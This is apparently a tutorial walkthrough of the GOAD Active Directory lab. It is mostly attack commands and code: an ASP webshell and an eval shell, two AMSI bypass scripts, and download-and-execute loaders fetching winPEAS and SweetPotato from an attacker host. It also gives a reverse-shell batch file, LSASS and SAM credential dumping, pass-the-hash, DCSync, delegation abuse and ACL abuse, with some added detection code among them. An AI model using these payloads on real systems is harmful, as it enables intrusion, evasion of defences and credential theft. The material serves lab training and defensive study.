Domain Penetration Testing with GOAD (Game Of Active Directory) v2 (Part 3)
Word count: 975 | 2025-08-25 22:58:34

GOAD (Game Of Active Directory) v2 tutorial notes

0x08 Privilege Escalation

IIS - webshell exploitation

  1. Obtain a webshell through the upload vulnerability:
    • Target URL: http://192.168.56.22/Default.aspx
    • Webshell code provided by the author:
      <%
      Function getResult(theParam)
          Dim objSh, objResult
          Set objSh = CreateObject("WScript.Shell")
          Set objResult = objSh.exec(theParam)
          getResult = objResult.StdOut.ReadAll
      end Function
      %>
      <HTML>
          <BODY>
              Enter command:
                  <FORM action="" method="POST">
                      <input type="text" name="param" size=45 value="<%= myValue %>">
                      <input type="submit" value="Run">
                  </FORM>
                  <p>
              Result :
              <% 
              myValue = request("param")
              thisDir = getResult("cmd /c" & myValue)
              Response.Write(thisDir)
              %>
              </p>
              <br>
          </BODY>
      </HTML>
      
    • AntSword webshell code:
      <%Function xxxx(str) eval str End Function%><%D = request("ant")%><%xxxx D%>
      

AMSI bypass techniques

  1. Modified AMSI bypass code:
    $x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils')
    $y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static')
    $z=$y.GetValue($null)
    [Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
    
  2. Rasta Mouse's AMSI bypass:
    $Win32 = @"
    using System;
    using System.Runtime.InteropServices;
    public class Win32 {
        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string name);
        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
    }
    "@
    Add-Type $Win32
    $LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
    $Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
    $p = 0
    [Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
    $Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
    [System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
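
The two snippets above hide the type and field names behind string concatenation, which is exactly what a detection rule over PowerShell script block logging (Event ID 4104) has to undo before it can match anything. The Python below is an added example for this write-up, not code from the original post or from the GOAD project: it collapses concatenated string literals to a fixpoint, then flags a block that references AMSI internals together with a memory-write primitive. The function names, the indicator lists and the three sample blocks (two modelled on the snippets on this page, one benign) are constructed for the example.

```python
"""Flag AMSI-tampering indicators in PowerShell script block text (Event ID 4104)."""
import re

# Substrings that reference AMSI internals, matched after normalisation.
AMSI_INDICATORS = (
    "system.management.automation.amsiutils",
    "amsicontext",
    "amsiinitfailed",
    "amsiscanbuffer",
)
# Memory-write primitives; paired with an AMSI reference they indicate patching.
WRITE_PRIMITIVES = ("writeint32", "marshal]::copy", "virtualprotect")

# Matches one pair  'abc' + "def"  so it can be rewritten as 'abcdef'.
_CONCAT = re.compile(r"""(['"])(.*?)\1\s*\+\s*(['"])(.*?)\3""")


def normalize(script: str) -> str:
    """Collapse concatenated string literals until nothing changes, then
    lower-case, so 'Am'+'siUt'+'ils' becomes the plain 'amsiutils'."""
    prev, text = None, script
    while prev != text:
        prev = text
        text = _CONCAT.sub(lambda m: f"'{m.group(2)}{m.group(4)}'", text)
    return text.lower()


def classify(script: str) -> dict:
    """Report which indicator families one script block contains."""
    text = normalize(script)
    refs = [i for i in AMSI_INDICATORS if i in text]
    writes = [w for w in WRITE_PRIMITIVES if w in text]
    return {"amsi_refs": refs, "write_primitives": writes,
            "suspicious": bool(refs) and bool(writes)}


def scan_blocks(blocks):
    """Return the ids of (id, script_text) pairs classified as suspicious."""
    return [bid for bid, text in blocks if classify(text)["suspicious"]]


# Constructed sample script blocks: two modelled on this page, one benign.
SAMPLE_BLOCKS = [
    ("block-1",
     "$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils')\n"
     "$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static')\n"
     "$z=$y.GetValue($null)\n"
     "[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)"),
    ("block-2",
     '$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")\n'
     '$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")\n'
     '[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)\n'
     '[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)'),
    ("block-3",
     "Get-ChildItem C:\\Windows\\Temp | Where-Object Length -gt 1MB"),
]

if __name__ == "__main__":
    for block_id, text in SAMPLE_BLOCKS:
        print(block_id, classify(text))
```

Requiring both an AMSI reference and a write primitive keeps ordinary scripts that merely mention `amsi.dll` out of the alert queue; the normalisation step is what makes the first snippet visible at all, since its raw text never contains the word `AmsiUtils`.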
    

In-memory loading of tools

  1. Load winPEAS in memory:
    $data=(New-Object System.Net.WebClient).DownloadData('http://192.168.56.1:8081/winPEASany_ofs.exe')
    $asm = [System.Reflection.Assembly]::Load([byte[]]$data)
    $out = [Console]::Out
    $sWriter = New-Object IO.StringWriter
    [Console]::SetOut($sWriter)
    [winPEAS.Program]::Main("")
    [Console]::SetOut($out)
    $sWriter.ToString()
    

PrintSpoofer privilege escalation

  1. Escalate privileges with SweetPotato:
    • Prepare a .bat file that launches the reverse shell:
      echo "@echo off" > runme.bat
      echo "start /b $(python3 payload.py 192.168.56.1 4445)" >> runme.bat
      echo "exit /b" >> runme.bat
      
    • Run SweetPotato:
      $data=(New-Object System.Net.WebClient).DownloadData('http://192.168.56.1:8080/SweetPotato.exe')
      $asm = [System.Reflection.Assembly]::Load([byte[]]$data)
      $out = [Console]::Out
      $sWriter = New-Object IO.StringWriter
      [Console]::SetOut($sWriter)
      [SweetPotato.Program]::Main(@('-p=C:\temp\runme.bat'))
      [Console]::SetOut($out)
      $sWriter.ToString()
      

KrbRelay privilege escalation

  1. Check LDAP signing:
    cme ldap 192.168.56.10-12 -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M ldap-signing
    
  2. Check the MachineAccountQuota (MAQ):
    cme ldap 192.168.56.11 -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M MAQ
    
  3. Add a computer account:
    addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH 'north.sevenkingdoms.local/jon.snow:iknownothing'
    
  4. Get the computer account's SID:
    $o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=sevenkingdoms,DC=local").objectSID
    (New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
    
  5. Run KrbRelay:
    .\KrbRelay.exe -spn ldap/winterfell.north.sevenkingdoms.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3279614554-4259096442-670903954-1122 -port 443
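
Step 4 above converts the binary objectSID returned by LDAP into its string form with .NET. As an added example (not from the original post or from GOAD), the Python below performs the same conversion in both directions without any Windows API, following the SID wire layout (revision byte, sub-authority count byte, 48-bit big-endian identifier authority, then little-endian 32-bit sub-authorities), and splits off the RID. The function names are assumptions for this example; the SID string from step 5 is reused as sample input, and S-1-5-32-544 is the well-known local Administrators group.

```python
"""Convert between the binary objectSid attribute and the S-1-... string form."""
import struct


def sid_bytes_to_string(data: bytes) -> str:
    """Decode a binary SID as returned in the LDAP objectSid attribute."""
    if len(data) < 8:
        raise ValueError("SID too short")
    revision, count = data[0], data[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if count > 15 or len(data) != 8 + 4 * count:
        raise ValueError("sub-authority count does not match SID length")
    authority = int.from_bytes(data[2:8], "big")          # 48-bit big-endian
    subs = struct.unpack_from(f"<{count}I", data, 8)      # little-endian uint32s
    return "S-1-" + "-".join(str(x) for x in (authority, *subs))


def sid_string_to_bytes(sid: str) -> bytes:
    """Encode an S-1-... string back into the binary layout."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a revision-1 SID string")
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15 or any(not 0 <= s <= 0xFFFFFFFF for s in subs):
        raise ValueError("invalid sub-authorities")
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def split_rid(sid: str):
    """Split 'S-1-5-21-...-1122' into (domain SID, RID)."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


# Sample input: the computer account SID shown in step 5 of this page.
SAMPLE_SID = "S-1-5-21-3279614554-4259096442-670903954-1122"

if __name__ == "__main__":
    raw = sid_string_to_bytes(SAMPLE_SID)
    print(raw.hex())
    print(sid_bytes_to_string(raw))
    print(split_rid(SAMPLE_SID))
```

The length check matters when parsing LDAP results: a truncated or padded objectSid value decodes to a plausible-looking but wrong string if the sub-authority count is trusted blindly.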
    

0x09 Lateral Movement

Credential extraction

  1. Extract credentials with secretsdump:
    python secretsdump.py NORTH/jeor.mormont:'_L0ngCl@w_'@192.168.56.22
    
  2. Extract SAM and SYSTEM from the registry:
    reg.py NORTH/jeor.mormont:'_L0ngCl@w_'@192.168.56.22 save -keyName 'HKLM\SAM' -o '\\192.168.56.1\share'
    reg.py NORTH/jeor.mormont:'_L0ngCl@w_'@192.168.56.22 save -keyName 'HKLM\SYSTEM' -o '\\192.168.56.1\share'
    

Password reuse attacks

  1. Check for password reuse with CrackMapExec:
    cme smb 192.168.56.10-23 -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' --local-auth
    

LSASS dumping

  1. Dump LSASS with lsassy:
    lsassy -d north.sevenkingdoms.local -u jeor.mormont -p _L0ngCl@w_ 192.168.56.22 -m dumpertdll -O dumpertdll_path=Outflank-Dumpert-DLL.dll
    

Lateral movement techniques

  1. Impacket tools:

    • PsExec:
      psexec -hashes ':cba36eccfd9d949c73bc73715364aff5' NORTH/catelyn.stark@192.168.56.11
      
    • WmiExec:
      wmiexec.py -hashes ':cba36eccfd9d949c73bc73715364aff5' NORTH/catelyn.stark@192.168.56.11
      
    • SmbExec:
      smbexec.py -hashes ':cba36eccfd9d949c73bc73715364aff5' NORTH/catelyn.stark@192.168.56.11
      
    • AtExec:
      atexec.py -hashes ':cba36eccfd9d949c73bc73715364aff5' NORTH/catelyn.stark@192.168.56.11 whoami
      
    • DcomExec:
      dcomexec.py -hashes ':cba36eccfd9d949c73bc73715364aff5' NORTH/catelyn.stark@192.168.56.11
      
  2. Run a command with CrackMapExec:

    cme smb 192.168.56.11 -H ':cba36eccfd9d949c73bc73715364aff5' -d 'north' -u 'catelyn.stark' -x whoami
    
  3. WinRM connection:

    evil-winrm -i 192.168.56.11 -u catelyn.stark -H 'cba36eccfd9d949c73bc73715364aff5'
    
  4. RDP pass-the-hash:

    • Enable Restricted Admin mode:
      New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
      
    • Connect with xfreerdp:
      xfreerdp /u:catelyn.stark /d:north.sevenkingdoms.local /pth:cba36eccfd9d949c73bc73715364aff5 /v:192.168.56.11
      

Using the TGT

  1. Obtain a TGT:
    getTGT.py -hashes ':cba36eccfd9d949c73bc73715364aff5' north.sevenkingdoms.local/catelyn.stark
    export KRB5CCNAME=catelyn.stark.ccache
    
  2. Use the TGT:
    wmiexec.py -k -no-pass north.sevenkingdoms.local/catelyn.stark@winterfel
    

0x0A Delegation attacks

Unconstrained delegation

  1. Monitor TGTs with Rubeus:
    [Rubeus.Program]::MainString("triage")
    
  2. Coerce the DC to authenticate:
    python coercer.py -u arya.stark -d north.sevenkingdoms.local -p Needle -t kingslanding.sevenkingdoms.local -l winterfell
    
  3. Extract the TGT:
    [Rubeus.Program]::MainString("dump /user:kingslanding$ /service:krbtgt /nowrap")
    
  4. Convert to ccache:
    cat tgt.b64|base64 -d > ticket.kirbi
    ticketConverter.py ticket.kirbi ticket.ccache
    export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
    
  5. DCSync:
    secretsdump.py -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING
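
The DCSync in step 5 is a directory replication request, which a domain controller with Directory Service Access auditing records as Security Event ID 4662 with the replication control-access rights listed in the Properties field. The Python below is an added detection example for this write-up, not code from the original post or from GOAD: it correlates each 4662 record with the 4624 logon that produced it, so a DC account replicating from an address that is not a DC (as in steps 3 to 5, where the DC's TGT is replayed from another host) is flagged alongside any non-DC principal. The three replication GUIDs are the well-known schema extended rights; the event records, the DC allow-lists and the placeholder GUID in the last record are constructed for the example.

```python
"""Flag directory-replication access (DCSync-style) from unexpected principals or hosts."""
import re

# Well-known AD extended rights that grant directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)


def replication_rights_in(properties: str) -> list:
    """Names of the replication rights referenced in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events, dc_accounts, dc_addresses):
    """One alert per 4662 replication access that is not a DC account acting
    from a DC address. The source address comes from the 4624 logon whose
    TargetLogonId equals the 4662 SubjectLogonId."""
    logon_ip = {e["TargetLogonId"]: e["IpAddress"]
                for e in events if e["EventID"] == 4624}
    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = replication_rights_in(e.get("Properties", ""))
        if not rights:
            continue  # 4662 for something other than replication
        user = e["SubjectUserName"].upper()
        ip = logon_ip.get(e["SubjectLogonId"], "unknown")
        if user in dc_accounts and ip in dc_addresses:
            continue  # expected: a DC replicating from a DC
        alerts.append({"user": user, "ip": ip, "rights": rights,
                       "logon_id": e["SubjectLogonId"]})
    return alerts


# Constructed allow-lists and event records modelled on this lab's hosts.
DC_ACCOUNTS = {"KINGSLANDING$"}
DC_ADDRESSES = {"192.168.56.10"}
GET_CHANGES = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
GET_CHANGES_ALL = "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_EVENTS = [
    # Normal replication: the DC account logs on from the DC's own address.
    {"EventID": 4624, "TargetUserName": "KINGSLANDING$",
     "TargetLogonId": "0x1a2b", "IpAddress": "192.168.56.10"},
    {"EventID": 4662, "SubjectUserName": "KINGSLANDING$", "SubjectLogonId": "0x1a2b",
     "Properties": f"{GET_CHANGES} {GET_CHANGES_ALL}"},
    # Same account, but the logon came from a non-DC host.
    {"EventID": 4624, "TargetUserName": "KINGSLANDING$",
     "TargetLogonId": "0x7c4d", "IpAddress": "192.168.56.1"},
    {"EventID": 4662, "SubjectUserName": "KINGSLANDING$", "SubjectLogonId": "0x7c4d",
     "Properties": f"{GET_CHANGES} {GET_CHANGES_ALL}"},
    # A user account requesting replication, with no matching 4624 captured.
    {"EventID": 4662, "SubjectUserName": "jon.snow", "SubjectLogonId": "0x9e0f",
     "Properties": GET_CHANGES},
    # Unrelated 4662 (placeholder GUID, constructed): must not alert.
    {"EventID": 4662, "SubjectUserName": "jon.snow", "SubjectLogonId": "0x9e0f",
     "Properties": "{deadbeef-0000-4000-8000-000000000001}"},
]

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS, DC_ACCOUNTS, DC_ADDRESSES):
        print(f"ALERT {a['user']} from {a['ip']} (logon {a['logon_id']}): {', '.join(a['rights'])}")
```

Two points a practitioner should keep in mind: 4662 is only produced when Directory Service Access auditing is enabled and the domain object's SACL audits control access for the principals of interest, and an alert on a DC account is only meaningful with the logon correlation shown here, since the account name alone looks legitimate.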
    

Constrained delegation

  1. Using protocol transition:
    • Rubeus:
      .\Rubeus.exe asktgt /user:jon.snow /domain:north.sevenkingdoms.local /rc4:B8D76E56E9DAC90539AFF05E3CCB1755
      .\Rubeus.exe s4u /ticket:put_the__previous_ticket_here /impersonateuser:administrator /msdsspn:CIFS/winterfell /ptt
      
    • Impacket:
      getST.py -spn 'CIFS/winterfell' -impersonate Administrator -dc-ip '192.168.56.11' 'north.sevenkingdoms.local/jon.snow:iknownothing'
      export KRB5CCNAME=Administrator.ccache
      python wmiexec.py -k -no-pass north.sevenkingdoms.local/administrator@winterfell
      

Resource-based constrained delegation (RBCD)

  1. Add a computer account:
    addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host kingslanding.sevenkingdoms.local 'sevenkingdoms.local/stannis.baratheon:Drag0nst0ne'
    
  2. Add the delegation:
    rbcd.py -delegate-from 'rbcd$' -delegate-to 'kingslanding$' -dc-ip 'kingslanding.sevenkingdoms.local' -action 'write' sevenkingdoms.local/stannis.baratheon:Drag0nst0ne
    
  3. Obtain a TGT:
    getST.py -spn 'cifs/kingslanding.sevenkingdoms.local' -impersonate Administrator -dc-ip 'kingslanding.sevenkingdoms.local' 'sevenkingdoms.local/rbcd$:rbcdpass'
    export KRB5CCNAME=/workspace/rbcd/Administrator@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache
    wmiexec.py -k -no-pass @kingslanding.sevenkingdoms.local
    

0x0B ACL attacks

Password change

  1. Change a user's password:
    net rpc password jaime.lannister -U sevenkingdoms.local/tywin.lannister%powerkingftw135 -S kingslanding.sevenkingdoms.local
    

Targeted Kerberoasting

  1. Using targetedKerberoast:
    python targetedKerberoast.py -v -d sevenkingdoms.local -u jaime.lannister -p pasdebraspasdechocolat --request-user joffrey.baratheon
    

Shadow Credentials

  1. Using certipy:
    certipy shadow auto -u jaime.lannister@sevenkingdoms.local -p 'pasdebraspasdechocolat' -account 'joffrey.baratheon'
    

DACL editing

  1. Using dacledit:
    dacledit.py -action 'write' -rights 'FullControl' -principal joffrey.baratheon -target 'tyron.lannister' 'sevenkingdoms.local'/'joffrey.baratheon':'1killerlion'
    

Group operations

  1. Add a group member with ldeep:
    ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 add_to_group "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" "CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local"
    

Owner modification

  1. Using owneredit:
    owneredit.py -action write -new-owner 'tyron.lannister' -target 'kingsguard' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' sevenkingdoms.local/tyron.lannister
    

GPO abuse

  1. Using pyGPOAbuse:
    python3 pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "C040A8A9-BDB0-488B-84FF-7DD09C1C9337"
    

Reading LAPS passwords

  1. Using CME:
    cme ldap 192.168.56.12 -d essos.local -u jorah.mormont -p 'H0nnor!' --module laps
    